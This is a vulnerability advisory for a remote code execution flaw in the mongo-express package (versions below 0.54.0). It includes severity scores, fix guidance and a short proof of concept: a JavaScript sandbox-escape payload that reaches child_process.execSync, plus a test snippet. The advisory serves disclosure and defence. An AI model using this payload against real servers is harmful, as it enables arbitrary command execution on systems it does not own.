Remote Code Execution (RCE) Affecting mongo-express package, versions <0.54.0


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Scope Changed
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 97.37% (100th percentile)
Expand this section
NVD
9.9 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-MONGOEXPRESS-473215
  • published 16 Oct 2019
  • disclosed 14 Oct 2019
  • credit Jonathan Leitschuh

How to fix?

Upgrade mongo-express to version 0.54.0 or higher.

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {
      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
      `;
      const result = bson.toBSON(calculatorTest);
    });